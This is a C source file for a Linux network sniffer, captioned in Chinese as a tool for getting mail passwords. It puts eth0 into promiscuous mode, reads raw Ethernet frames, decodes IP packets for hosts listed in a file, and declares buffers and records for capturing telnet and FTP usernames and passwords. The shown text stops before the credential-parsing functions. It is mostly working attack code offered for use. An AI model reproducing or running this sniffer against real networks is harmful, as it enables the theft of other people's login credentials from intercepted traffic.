np.c

linux下获取邮件密码

/**************************************************************************
                          sniffer.c  -  description
                             -------------------
    begin                : Sun Apr 27 2003
    copyright            : (C) 2003 by root
    email                : root@scout
 ***************************************************************************/

/***************************************************************************
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 ***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if_arp.h>
#include <arpa/inet.h>
//#include <socketbits.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <net/if.h>
#include <unistd.h>
#include <ctype.h>
#include <fcntl.h>
#include <sys/types.h>

#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

//#include <linux/if.h>

#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>

//#include <linux/socket.h>

#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <time.h>

//#include "header.h"

struct ifreq old_ifr;

int telnetuserflag,telnetpswflag;
char telnetuser[128];
char telnetpsw[128];

/*
 * Ethernet header
 */

typedef struct _EtherHdr
{
    u_int8_t ether_dst[6];
    u_int8_t ether_src[6];
    u_int16_t ether_type;

}         EtherHdr;


/* Can't add any fields not in the real header here
   because of how the decoder uses structure overlaying */
typedef struct _IPHdr
{
#if defined(WORDS_BIGENDIAN)
    u_int8_t ip_ver:4,  /* IP version */
    ip_hlen:4;          /* IP header length */
#else
    u_int8_t ip_hlen:4, ip_ver:4;
#endif
    u_int8_t ip_tos;        /* type of service */
    u_int16_t ip_len;       /* datagram length */
    u_int16_t ip_id;        /* identification  */
    u_int16_t ip_off;       /* fragment offset */
    u_int8_t ip_ttl;        /* time to live field */
    u_int8_t ip_proto;      /* datagram protocol */
    u_int16_t ip_csum;      /* checksum */
  //  struct in_addr ip_src;  /* source IP */
    //struct in_addr ip_dst;  /* dest IP */
}      IPHdr;


/* Can't add any fields not in the real header here
   because of how the decoder uses structure overlaying */
typedef struct _TCPHdr
{
    u_int16_t th_sport;     /* source port */
    u_int16_t th_dport;     /* destination port */
    u_int32_t th_seq;       /* sequence number */
    u_int32_t th_ack;       /* acknowledgement number */
#ifdef WORDS_BIGENDIAN
    u_int8_t th_off:4,      /* data offset */
    th_x2:4;       /* (unused) */
#else
    u_int8_t th_x2:4, th_off:4;
#endif
    u_int8_t th_flags;
    u_int16_t th_win;       /* window */
    u_int16_t th_sum;       /* checksum */
    u_int16_t th_urp;       /* urgent pointer */

}       TCPHdr;

typedef struct _packet
{
  u_int8_t * pkt;
  u_int32_t  pkt_len;
  EtherHdr  *eth;
  IPHdr     * iph;
  TCPHdr    * tcph;
  u_int8_t *data;     /* packet payload pointer */
  u_int16_t dsize;        /* packet payload size */


}packet;


//服务应用信息
typedef struct App_Infotag
{ //telnet or ftp etc
unsigned    long   hostIP;   //主机IP地址
unsigned	long   app_type;          //服务类型
unsigned    char   user_name[128];        //用户名
unsigned	char   user_pass[128];        //密码
unsigned	long   source_ip;                 //源IP
unsigned	long   source_port;                //源端口
unsigned	long   dest_ip;                   //目的IP
unsigned	long   dest_port;                  //目的端口
unsigned	long   App_timer;                      //时间戳
}App_Info;


//文件结构定义
typedef struct  filestruct
{
 unsigned  char infoname[128];   //存储信息名
 long          totalrecnum;     //总的数据个数
 long          reclengch;       //记录 struct 长度
 long          firstrecoffset;   //首记录地址
 long          lastrecoffset;    //末记录的长度
 unsigned char space[128];      //空格   待扩展  无实际意义。
}file_struct;



u_int8_t  buffer[1514];
App_Info app_info;
packet   p;
file_struct fstruct;

char ip[255][18];
//char port[255][6];
int i=0,j;



char appinfofilename[128];//="appinfor.txt";  //应用服务信息文件名

//fouction
int Inet_OpenRawSock(char *iface);
int Inet_SetPromisc(char *iface);

void SetNonBlock(int sock);
void Inet_Restore_ifr(void);
void decodertcp(packet * p, u_int8_t * pkt_tcph,int len);
void docoderIp(packet * p,u_int8_t * pkt, int packte_len);
void getappinfo(packet p);
unsigned char * memicmp(unsigned char * d_str,unsigned char * s_str, int d_len,int s_len);
void writeappinfo(App_Info app_info);

int main()
{
int bytes_received,fromlen;
int sock;
FILE *fto;
char linebuf[30];

struct sockaddr_in from ;
fto= fopen("Monitor.txt","r");

while(fgets(linebuf,31,fto)!=NULL)
   {
        sscanf(linebuf,"%s ",ip[i]);
        i++;
   }

 for(j=0;j<i;j++)             //check the openfile program
  {
        printf("%s\n",ip[j]);

  }


sock=Inet_OpenRawSock("eth0");
Inet_SetPromisc("eth0");


memset(buffer,0,1514);





while(1)
  {
      fromlen=sizeof(from);
      bytes_received=recvfrom(sock,(u_int8_t *)buffer,sizeof(buffer),0,(struct sockaddr *)&from,&fromlen);
      if(bytes_received>0)
      {
          memset(&p,0,sizeof(packet));
          p.pkt=buffer;
          p.pkt_len= (long)bytes_received;
          p.eth=(EtherHdr *)buffer;
          if(p.eth->ether_type==8)
           {
               //printf("PACKET IS %s\n",buffer);
               docoderIp(&p,p.pkt+14,p.pkt_len);


            }

       }
     //printf(" bytes received %d\n",bytes_received);

  }

}





int Inet_SetPromisc(char *iface)
{

   int sock1;
   struct ifreq ifr;

//   DEBUG_MSG("Inet_SetPromisc\tiface: %s", iface);

   sock1 = Inet_OpenRawSock(iface);

   memset(&ifr, 0, sizeof(ifr));
   strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name));

   if ( ioctl(sock1, SIOCGIFFLAGS, &ifr) < 0 )
      perror("ioctl(SIOCGIFFLAGS)");

   memset(&old_ifr, 0, sizeof(old_ifr));
   old_ifr.ifr_flags = ifr.ifr_flags;              //save old flags

   if (!(ifr.ifr_flags & IFF_PROMISC))
   {
      ifr.ifr_flags |= IFF_PROMISC;
      if ( ioctl(sock1, SIOCSIFFLAGS, &ifr) < 0 )      // promisc mode
         perror("ioctl(SIOCSIFFLAGS) | promisc on");
      atexit(Inet_Restore_ifr);
   }


   close(sock1);
   return 0;

}


int Inet_OpenRawSock(char *iface)
{
   int sock;
#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)
   struct ifreq ifr;
   struct sockaddr_ll sll;
#else
   struct sockaddr sa;
#endif

#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)
   sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
#else
   sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL));
#endif
   if (sock < 0)
      perror("socket()");



#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)

   memset(&ifr, 0, sizeof(ifr));
   strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name));

   if ( ioctl(sock, SIOCGIFINDEX, &ifr) < 0)
      ERROR_MSG("ioctl(SIOCGIFINDEX)");

   memset(&sll, 0, sizeof(sll));
   sll.sll_family = AF_PACKET;
   sll.sll_ifindex = ifr.ifr_ifindex;
   sll.sll_protocol = htons(ETH_P_ALL);

   if ( bind(sock, (struct sockaddr *) &sll, sizeof(sll)) == -1)
      ERROR_MSG("bind()");
#else

   memset(&sa, 0, sizeof(sa));
   strncpy(sa.sa_data, iface, sizeof(sa.sa_data));
   if ( bind(sock, &sa, sizeof(sa)) == -1)
      perror("bind()");

#endif

   return sock;
}





void Inet_Restore_ifr(void)